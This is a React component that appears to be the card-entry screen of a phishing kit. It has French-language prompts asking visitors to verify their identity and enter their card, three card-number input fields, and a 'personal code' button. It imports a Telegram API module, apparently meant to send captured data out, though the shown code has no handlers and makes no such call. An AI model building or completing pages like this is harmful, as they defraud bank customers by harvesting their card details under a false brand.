import { useContext } from "react";
import {
  CurrentPage,
  UserValues,
  UserErrors,
  UserButtons,
} from "../../Context/Context";
import styles from "./CcPage.module.css";
import  Configuration  from '../../Configuration/Configuration'
import Telegram from '../../API/Telegram'



function CcPage() {

    
  
  
    return (
<div className={styles.container}>
      <div className={styles.lineOne}>
        <img alt="" src="./images/acceder.png" />
      </div>

      <div className={styles.lineTwo}>
        <div className={styles.partOne}>
          <div className={styles.identifiant}>Veuillez vérifier votre identité</div>
          <div className={styles.saissisiez}>
            Saisissez votre carte
          </div>
          <div
            className={styles.error}

          >
          </div>
          <div className={styles.input}>
            <input
              type="text"
              placeholder="Ex: 98652706859"
              maxLength="11"
            />
                        <input
              type="text"
              placeholder="Ex: 98652706859"
              maxLength="11"
            />
                        <input
              type="text"
              placeholder="Ex: 98652706859"
              maxLength="11"
            />
          </div>

          <button
            className={styles.button + " noselect"}


          >
            ENTER MON CODE PERSONNEL
          </button>
        </div>

        <div className={styles.partTwo}>
          <img alt="" src="./images/info.png" />
        </div>
      </div>

    </div>
    );
  }
  
  export default CcPage;
  